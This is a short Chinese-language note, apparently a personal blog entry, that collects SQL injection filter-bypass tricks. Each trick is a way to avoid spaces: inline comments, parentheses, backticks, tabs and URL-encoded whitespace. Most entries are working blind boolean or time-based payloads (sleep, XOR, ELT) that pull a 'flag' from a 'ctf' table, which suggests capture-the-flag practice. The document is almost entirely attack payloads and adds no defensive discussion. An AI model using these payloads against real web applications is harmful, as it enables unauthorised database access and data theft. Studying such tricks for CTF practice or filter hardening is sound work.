sql注入绕过总结
记录一些sql注入的绕过技巧,以后应该用得上
替代空格
1.内联注释
1 | select/**/*from/**/user; |
2.使用括号
1 | select * from user where id = 1 and (if(ascii(substr(database()from(1)for(1)))=115,sleep(4),null)); |
可以配合异或使用
1 | select * from user where id=1^(SELECT(ASCII(MID((SELECT((flag))FROM(ctf)),1,1))=1))^1=1 |
3.反引号
1 | select * from passage where id=1^(SELECT(ASCII(MID((SELECT`flag`FROM`ctf`),1,1))=102))^1=1; |
4.tab 两个空格
1 | select content from passage where id=ELT(left((select flag from ctf),1)='f',SLEEP(1)) |
5.url编码
1 | %20 %09 %0a %0b %0c %0d %a0 %00 |